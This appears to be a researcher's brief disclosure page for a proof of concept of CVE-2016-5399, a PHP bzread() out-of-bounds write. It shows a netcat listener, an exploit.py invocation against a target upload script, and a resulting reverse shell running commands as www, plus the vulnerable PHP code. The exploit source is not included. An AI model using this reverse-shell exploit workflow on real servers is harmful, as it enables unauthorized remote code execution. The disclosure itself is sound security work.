Hans Jerry Illikainen

CVE-2016-5399: php 7.0.8: out-of-bounds write in bzread()

Jul 21, 2016

PoC for CVE-2016-5399 targeting FreeBSD 10.3 x86-64 running php-fpm behind nginx.

$ nc -v -l 1.2.3.4 5555 &
Listening on [1.2.3.4] (family 0, port 5555)

$ python exploit.py --ip 1.2.3.4 --port 5555 http://target/upload.php
[*] sending archive to http://target/upload.php (0)

Connection from [target] port 5555 [tcp/*] accepted (family 2, sport 49479)
$ fg
id
uid=80(www) gid=80(www) groups=80(www)

uname -imrsU
FreeBSD 10.3-RELEASE-p4 amd64 GENERIC 1003000

/usr/sbin/pkg query -g "=> %n-%v" php*
=> php70-7.0.8
=> php70-bz2-7.0.8

cat upload.php
<?php
$fp = bzopen($_FILES["file"]["tmp_name"], "r");
if ($fp === FALSE) {
    exit("ERROR: bzopen()");
}

$data = "";
while (!feof($fp)) {
    $res = bzread($fp);
    if ($res === FALSE) {
        exit("ERROR: bzread()");
    }
    $data .= $res;
}
bzclose($fp);
?>